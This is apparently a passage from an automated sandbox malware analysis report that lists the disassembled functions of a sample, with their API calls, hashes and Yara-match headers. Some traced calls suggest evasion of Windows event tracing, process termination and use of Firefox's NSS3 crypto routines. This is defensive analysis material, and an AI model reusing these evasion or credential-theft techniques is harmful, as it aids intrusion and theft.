                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsCreateDeviceRelease
                                                                                                                                                                                                              • String ID: DISPLAY
                                                                                                                                                                                                              • API String ID: 1843228801-865373369
                                                                                                                                                                                                              • Opcode ID: 8972dd90082569306de0aaa9fe7340dae447ee769de69c4d35af4794a2d73844
                                                                                                                                                                                                              • Instruction ID: 07dbf5c6a189ce464c174a3a1d40500c665c45dbb1cce79af262efc316466f72
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8972dd90082569306de0aaa9fe7340dae447ee769de69c4d35af4794a2d73844
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62D012313D830477F1701766BC0EF1A2924E7C7F03F200004F705580D046B01002E736
                                                                                                                                                                                                              Function 009218B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 009218BA
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,EtwEventWrite), ref: 009218CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                                                                                                              • String ID: EtwEventWrite$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1646373207-1851843765
                                                                                                                                                                                                              • Opcode ID: 73904dea399577527728db8cadefdc4cbab804246f4e96fa651afd022c9eabc1
                                                                                                                                                                                                              • Instruction ID: b5e9dc1700d03b1614d303697f514e37838ab3cca82baeccac45e094d3c421c2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 73904dea399577527728db8cadefdc4cbab804246f4e96fa651afd022c9eabc1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6B092607543019B8F409B77AF8EA4A36A96AE0B4B3800580BA8AC2094D7A88018F716
                                                                                                                                                                                                              Function 0092AFF6 Relevance: 6.2, APIs: 4, Instructions: 222filestringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 009304BC: lstrcpyA.KERNEL32(00000000,00000000,?,00937207,009566BA,?,?,?,?,0093871B), ref: 009304E2
                                                                                                                                                                                                                • Part of subcall function 00931C1F: GetSystemTime.KERNEL32(?,009566E2,?), ref: 00931C4E
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 009305F2
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 0093061A
                                                                                                                                                                                                                • Part of subcall function 009305DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,00937228,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930625
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcpyA.KERNEL32(00000000,?,0000000C,00937775,009566D6), ref: 009305CA
                                                                                                                                                                                                                • Part of subcall function 0093059C: lstrcatA.KERNEL32(?,?), ref: 009305D4
                                                                                                                                                                                                                • Part of subcall function 00930562: lstrcpyA.KERNEL32(00000000,?,00000000,00937246,00956C20,00000000,009566BA,?,?,?,?,0093871B), ref: 00930592
                                                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 0092B09B
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B251
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?), ref: 0092B26C
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 0092B2BE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 211194620-0
                                                                                                                                                                                                              • Opcode ID: 6a3e628394f030312965929d00fc2eb0f23ec270d363f0574f2a48e2611456b5
                                                                                                                                                                                                              • Instruction ID: f247b0424dba2b10f9b888e4fa456338024f9fa0313d9f9a8eb9b580a4505901
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a3e628394f030312965929d00fc2eb0f23ec270d363f0574f2a48e2611456b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D811936900129ABCF05FBA5EE47ADDB774AF84301F614121F944B716ADF70AE868F90
                                                                                                                                                                                                              Function 6CB31D60 Relevance: 6.1, APIs: 4, Instructions: 141memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?), ref: 6CB31D8F
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CB31DA6
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB210F3
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: EnterCriticalSection.KERNEL32(?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2110C
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PL_ArenaAllocate.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21141
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: PR_Unlock.NSS3(?,?,?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB21182
                                                                                                                                                                                                                • Part of subcall function 6CB210C0: TlsGetValue.KERNEL32(?,6CAC8802,00000000,00000008,?,6CABEF74,00000000), ref: 6CB2119C
                                                                                                                                                                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CB31E13
                                                                                                                                                                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CB31ED0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ArenaUtil$Value$CriticalEnterSectionUnlock$Alloc_AllocateArena_FreeItem_Mark_
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 84796498-0
                                                                                                                                                                                                              • Opcode ID: 1e7f52ea7d78a16b8e491273c1244607f16ed2a89cbecf30e2d92ba0e2c1cc86
                                                                                                                                                                                                              • Instruction ID: be944221f862f9f20fd369ba223fd7efd123afce222f9830bb37c77258d6bbc0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e7f52ea7d78a16b8e491273c1244607f16ed2a89cbecf30e2d92ba0e2c1cc86
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05515B75A00269CFDB00CF94C884BAEB7B9FF49308F185129D81D9B790D732E945CB91
                                                                                                                                                                                                              Function 6CB97DE0 Relevance: 6.1, APIs: 4, Instructions: 108COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB97E10
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB97EA6
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6CB97EB5
                                                                                                                                                                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6CB97ED8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _byteswap_ulong
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4101233201-0
                                                                                                                                                                                                              • Opcode ID: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                              • Instruction ID: a3e476554dc44f5323ab00062810661f65ed29843cdbc9e6972829122d9f767e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 68fd819e4aa8e36df1224ea11687829a8446297eaaca2911829ad9927b1d0bc6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 933191B2A002518FDB04CF08C89199EBBE6FF8931871B8179D8596B711EB71EC45CBD1
                                                                                                                                                                                                              Function 6CAC6C50 Relevance: 6.1, APIs: 4, Instructions: 102memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6CAC6C8D
                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6CAC6CA9
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C), ref: 6CAC6CC0
                                                                                                                                                                                                              • SEC_ASN1EncodeItem_Util.NSS3(?,00000000,?,6CBE8FE0), ref: 6CAC6CFE
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Util$Alloc_Arena$EncodeItem_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2370200771-0
                                                                                                                                                                                                              • Opcode ID: 80f22dcb7fc805da10f6cd471af04a3de77121de4d30c063e971daca015518ac
                                                                                                                                                                                                              • Instruction ID: 81d7ce8184de0bbf49882761e4452acba2e11fe441fdd4fe8509387323f0915d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80f22dcb7fc805da10f6cd471af04a3de77121de4d30c063e971daca015518ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D03181B5A002169FDB04CF65C891ABFBBF9EF85248B14443DD905D7700EB31D945CBA1
                                                                                                                                                                                                              Function 0093C157 Relevance: 6.1, APIs: 4, Instructions: 98timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,762283C0,00000000,?,?,?,?,?,?,0093C720,?,009370B3,?), ref: 0093C1AA
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0093C720,?,009370B3), ref: 0093C1DA
                                                                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0093C720,?,009370B3,?), ref: 0093C206
                                                                                                                                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0093C720,?,009370B3,?), ref: 0093C214
                                                                                                                                                                                                                • Part of subcall function 0093BB22: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,00E324F0), ref: 0093BB56
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3986731826-0
                                                                                                                                                                                                              • Opcode ID: 57a4b4ba9f5f29633e6b82cea829e2cb91c2941f79573ee9bdfa92db518a2249
                                                                                                                                                                                                              • Instruction ID: 93595dff7f9cc10eea9339bbebf931522e4908e6faca48bbc70fee40ce1f610e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 57a4b4ba9f5f29633e6b82cea829e2cb91c2941f79573ee9bdfa92db518a2249
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 92419AB1904209DFCF11DFA9C880A9EBBF8FF88300F10016AE855EB266E3749945DF60
                                                                                                                                                                                                              Function 0093BF11 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • malloc.MSVCRT ref: 0093BF56
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0093BF6A
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0093BFB7
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,67184B81,?,00000000,00E324F0,?,00000001,00E324F0,?,0093AFFC,?,00000001,00E324F0,67184B81,?), ref: 0093BFD6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memmove$FileWritemalloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 803809635-0
                                                                                                                                                                                                              • Opcode ID: 368c71f4cf49087c03f4e5bef23095caf9278c9322bca322774f823f0885ac56
                                                                                                                                                                                                              • Instruction ID: c4fec1a779a138a83df7c854dabe666aa45a6bab1342ad100050c859fc9a4c04
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 368c71f4cf49087c03f4e5bef23095caf9278c9322bca322774f823f0885ac56
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52314A71604704AFDB21DF65D980A66B7F8FB48350F10992EFA4687A41DB70F904CF50
                                                                                                                                                                                                              Function 00932285 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _memset.LIBCMT ref: 009322AC
                                                                                                                                                                                                                • Part of subcall function 00931D36: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,009322D6,?), ref: 00931D41
                                                                                                                                                                                                                • Part of subcall function 00931D36: HeapAlloc.KERNEL32(00000000), ref: 00931D48
                                                                                                                                                                                                                • Part of subcall function 00931D36: wsprintfW.USER32 ref: 00931D59
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 00932352
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00932360
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00932367
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3393003879.0000000000920000.00000040.00000400.00020000.00000000.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000ADD000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000AFC000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B7D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3393003879.0000000000B90000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_920000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2224742867-0
                                                                                                                                                                                                              • Opcode ID: 37a2018d1bdff0bd3d8896e73ce4a3891efedc83b71362635038b7c167f2e3ae
                                                                                                                                                                                                              • Instruction ID: cae4842100eb0232bac690124497aedec1de41e385013ae1b00c9c4f3920fde1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37a2018d1bdff0bd3d8896e73ce4a3891efedc83b71362635038b7c167f2e3ae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D314D72A01218AFEB219FA0DD85DEEB7BCEF0A744F0404A5F509E6550DB349F848F52
                                                                                                                                                                                                              Function 6CB36DE0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6CB36E36
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CB36E57
                                                                                                                                                                                                                • Part of subcall function 6CB6C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB6C2BF
                                                                                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6CB36E7D
                                                                                                                                                                                                              • PR_MillisecondsToInterval.NSS3(?), ref: 6CB36EAA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.3416877073.000000006CA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CA40000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.3416838227.000000006CA40000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417188068.000000006CBDF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417240038.000000006CC1E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417263683.000000006CC1F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417298980.000000006CC20000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.3417326070.000000006CC25000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_6ca40000_7ZthFNAqYp.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: IntervalMilliseconds$ErrorValue
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3163584228-0
                                                                                                                                                                                                              • Opcode ID: d6705cd8da1accd9f6af1fb13927f0c73d92d527ab21b38d23446c813e3f6479
                                                                                                                                                                                                              • Instruction ID: 388034b21df8a742d5e582661d8780d846d1c530de347da981903d24bfc14159
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d6705cd8da1accd9f6af1fb13927f0c73d92d527ab21b38d23446c813e3f6479
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A7318F726115B2EEDB145E34D9043A6B7A5FB0131AF10163DD89ED6AC0EB30A95CCB92
                                                                                                                                                                                                              Function 6CB1DDE0 Relevance: 6.1, APIs: 4, Instructions: 86memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000,?,00000000,00000000,?,?,6CB1DDB1,?,00000000), ref: 6CB1DDF4
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: TlsGetValue.KERNEL32 ref: 6CB214E0
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: EnterCriticalSection.KERNEL32 ref: 6CB214F5
                                                                                                                                                                                                                • Part of subcall function 6CB214C0: PR_Unlock.NSS3 ref: 6CB2150D
                                                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000054,?,00000000,00000000,?,?,6CB1DDB1,?,00000000), ref: 6CB1DE0B
                                                                                                                                                                                                              • PORT_Alloc_Util.NSS3(00000054,?,00000000,00000000,?,?,6CB1DDB1,?,00000000), ref: 6CB1DE17
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: malloc.MOZGLUE(6CB18D2D,?,00000000,?), ref: 6CB20BF8
                                                                                                                                                                                                                • Part of subcall function 6CB20BE0: TlsGetValue.KERNEL32(6CB18D2D,?,00000000,?), ref: 6CB20C15
                                                                                                                                                                                                              • PR_SetError.NSS3(FFFFE009,00000000), ref: 6CB1DE80
                                                                                                                                                                                                              Memory Dump Source
